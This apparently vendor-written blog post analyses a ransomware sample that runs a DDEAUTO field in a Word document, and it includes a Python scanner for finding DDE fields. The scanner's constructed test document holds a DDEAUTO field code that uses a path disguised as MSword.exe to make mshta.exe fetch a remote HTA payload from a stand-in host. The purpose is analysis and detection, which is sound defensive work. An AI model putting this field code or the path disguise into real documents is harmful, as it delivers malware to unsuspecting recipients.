Malware Family: Vortex
SHA256 Hash Value
Macros in Microsoft Office have long been used by malware authors as a mechanism to download and execute a malicious payload on a system. Defensive measures introduced by Microsoft, such as disabling macros by default, have not stopped them: malware authors continue to devise social engineering lures that convince users to enable macros, at which point the VBA code can carry out its malicious actions. However, now that email gateways and other security products apply VBA filtering policies to MS Office documents, malware authors are turning to techniques that deliver and execute malicious payloads from Office applications without any macros at all.
Dynamic Data Exchange (DDE)
One such technique is the use of Dynamic Data Exchange (DDE), a protocol that allows Windows applications to share data. In this blog post, we take a closer look at a ransomware sample that uses DDE to launch an application directly from an MS Word document without a single line of VBA. Because no macro is present, the document passes security systems and email gateways whose policies only filter macros.
Microsoft defines DDE as a set of messages and guidelines that allows applications to share data. According to Microsoft's documentation, applications can use the DDE protocol for one-time data transfers and for continuous exchanges in which applications send updates to one another as new data becomes available.
Malware authors take advantage of this technique because an external application can be specified as the DDE data source: Word launches that application in order to retrieve the requested data. An attacker adds such a data source by inserting a Field, manually changing its Field Code to DDEAUTO and appending the application path together with any additional parameters (Figure 1).
Depending on the security settings in Word, one of two warnings will be displayed whenever DDE commands are executed in a Word document (Figures 2 and 3).
Please note that while the second warning message (Figure 3) may raise suspicion, it is easy for a malware author to change the real path to the executable in the message to make it seem innocuous.
Analysis of a Ransomware Sample Using DDE
The ransomware sample that we analyzed contains a DDEAUTO field. Word evaluates this field automatically when the document is opened; the field code supplies the full path of the executable to launch as well as the arguments to pass to it.
In this case, the sample launches mshta.exe with an external URL as its argument, as shown in Figure 4.
The path to mshta.exe is deliberately written so that Word reports MSword.exe as the target application in its prompt (Figure 5), which makes the warning appear harmless to the user.
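The following script is an added example, not VMRay's tooling and not code from the analysed sample. It shows the two points above in working form: how a DDEAUTO field is stored inside a .docx (a ZIP container whose WordprocessingML parts hold field codes in w:fldSimple/@w:instr or, for complex fields, spread over w:instrText runs between w:fldChar begin/end markers), and how a path that begins in the Office directory and names MSword.exe can still resolve to mshta.exe once its ..\ components are collapsed. The .docx it scans is constructed in memory; the field code, the path (a hypothetical imitation of the trick, not the sample's exact string) and the example.invalid URL are all assumptions for the demonstration.

```python
"""Flag DDE / DDEAUTO fields in .docx files and resolve the real target binary.

Added example, not VMRay's tooling or the analysed sample. The .docx built below
is constructed test data; its path imitates the MSword.exe trick described in
the post and is hypothetical, not the sample's exact field code.
"""
import io
import ntpath
import re
import xml.etree.ElementTree as ET
import zipfile

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"

# Field keyword, case-insensitive as Word treats it; \b stops "DDEX" from matching.
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)
# First argument after the keyword: either a quoted string or a bare token.
TARGET_RE = re.compile(r'\bDDE(?:AUTO)?\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)
# Parts that may hold fields. Scanning only document.xml would miss headers/footers.
PART_RE = re.compile(r"^word/(document|header\d*|footer\d*|footnotes|endnotes)\.xml$")


def extract_field_codes(xml_bytes):
    """Return every field code in one WordprocessingML part as a string.

    Simple fields keep their code in w:fldSimple/@w:instr. Complex fields are
    bracketed by w:fldChar begin/end and spread the code over several
    w:instrText runs; the fragments are re-joined so a code split across runs
    (a cheap way to defeat naive string matching) is seen whole.
    """
    root = ET.fromstring(xml_bytes)
    codes = [fld.get(W + "instr", "") for fld in root.iter(W + "fldSimple")]
    depth, buf = 0, []
    for el in root.iter():  # document order
        if el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                depth += 1
            elif kind == "end" and depth > 0:
                depth -= 1
                if depth == 0:
                    codes.append("".join(buf))
                    buf = []
        elif el.tag == W + "instrText" and depth > 0:
            buf.append(el.text or "")
    return codes


def scan_docx(docx_bytes):
    """Return [(part_name, normalised_field_code)] for each DDE/DDEAUTO field."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if PART_RE.match(name):
                for code in extract_field_codes(zf.read(name)):
                    if DDE_RE.search(code):
                        hits.append((name, " ".join(code.split())))
    return hits


def real_target(field_code):
    r"""Resolve the executable a DDE field will actually launch.

    Field codes escape backslashes as \\ ; after unescaping, ntpath.normpath
    collapses the ..\ components, so a path that starts in the Office folder and
    names MSword.exe resolves to whatever sits at the end of the walk-up.
    """
    m = TARGET_RE.search(field_code)
    if not m:
        return None
    raw = m.group(1) if m.group(1) is not None else m.group(2)
    return ntpath.normpath(raw.replace("\\\\", "\\"))


def build_docx(parts):
    """Write a minimal .docx (ZIP) from {part_name: xml_str}; constructed test data."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, xml in parts.items():
            zf.writestr(name, xml)
    return buf.getvalue()


# Constructed: DDEAUTO split over three runs, path walks up out of the Office folder.
DDE_SAMPLE_XML = r'''<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body><w:p>
<w:r><w:fldChar w:fldCharType="begin"/></w:r>
<w:r><w:instrText xml:space="preserve"> DDE</w:instrText></w:r>
<w:r><w:instrText xml:space="preserve">AUTO "C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe" </w:instrText></w:r>
<w:r><w:instrText xml:space="preserve">"http://example.invalid/payload.hta" </w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:t>Loading...</w:t></w:r>
<w:r><w:fldChar w:fldCharType="end"/></w:r>
</w:p></w:body></w:document>'''

# Constructed: ordinary HYPERLINK and PAGE fields that must not be flagged.
BENIGN_XML = r'''<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body><w:p>
<w:fldSimple w:instr=" HYPERLINK &quot;https://example.invalid/&quot; "><w:r><w:t>link</w:t></w:r></w:fldSimple>
<w:r><w:fldChar w:fldCharType="begin"/></w:r><w:r><w:instrText xml:space="preserve"> PAGE </w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:t>1</w:t></w:r><w:r><w:fldChar w:fldCharType="end"/></w:r>
</w:p></w:body></w:document>'''


if __name__ == "__main__":
    for name, code in scan_docx(build_docx({"word/document.xml": DDE_SAMPLE_XML})):
        print(f"{name}: {code}\n  launches: {real_target(code)}")
```

Running the script on the constructed document prints the re-joined DDEAUTO field and resolves its target to C:\windows\system32\mshta.exe, which is the whole point of the path trick: the first recognisable executable name in the string is MSword.exe, while the binary that actually runs is the last component after the ..\ walk-up. Two caveats apply. The scanner matches the textual keyword only, so a field that assembles "DDE" from character codes with nested QUOTE fields, or a legacy binary .doc file, needs a different parser; treat this as a triage aid rather than a gate. And always run it over every part the regex admits, since a field in a header or footer fires just as readily as one in the body.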
Ransomware Sample Behavior
The first action performed by the ransomware is to establish a connection with the C&C server and report the victim's IP address and other host information. This is highlighted in the Behavior section of the VMRay Analyzer report (Figure 6).
A second request to the C&C server returns data that is saved to a .bat file, which the malware later executes (Figures 7 and 8).
The next action is to download the encryption key from the C&C server (Figure 9). This key is then used in an encryption routine that encrypts the files on the user's system: the sample reads each file, creates a new file with an .aes extension, writes the encrypted contents into it and finally deletes the original (Figure 10).
Finally, the ransomware sample creates a “How to recover your files” text file in every directory of the user’s system (Figure 11).
VMRay Analyzer Results
While AV vendors have been slow to detect this new technique (Figure 12), VMRay's agentless, hypervisor-based dynamic analysis engine scored the file 100/100 with a severity label of 'Malicious'. Several malicious behavior patterns are detected (Figure 13), and the detailed behavior of the sample, including its network activity, is recorded in the Behavior section of the report.
An important point to note is that Sensepost reported this issue to Microsoft back in August 2017. Microsoft responded that no further action would be taken and that it would be considered as a candidate bug for a future version.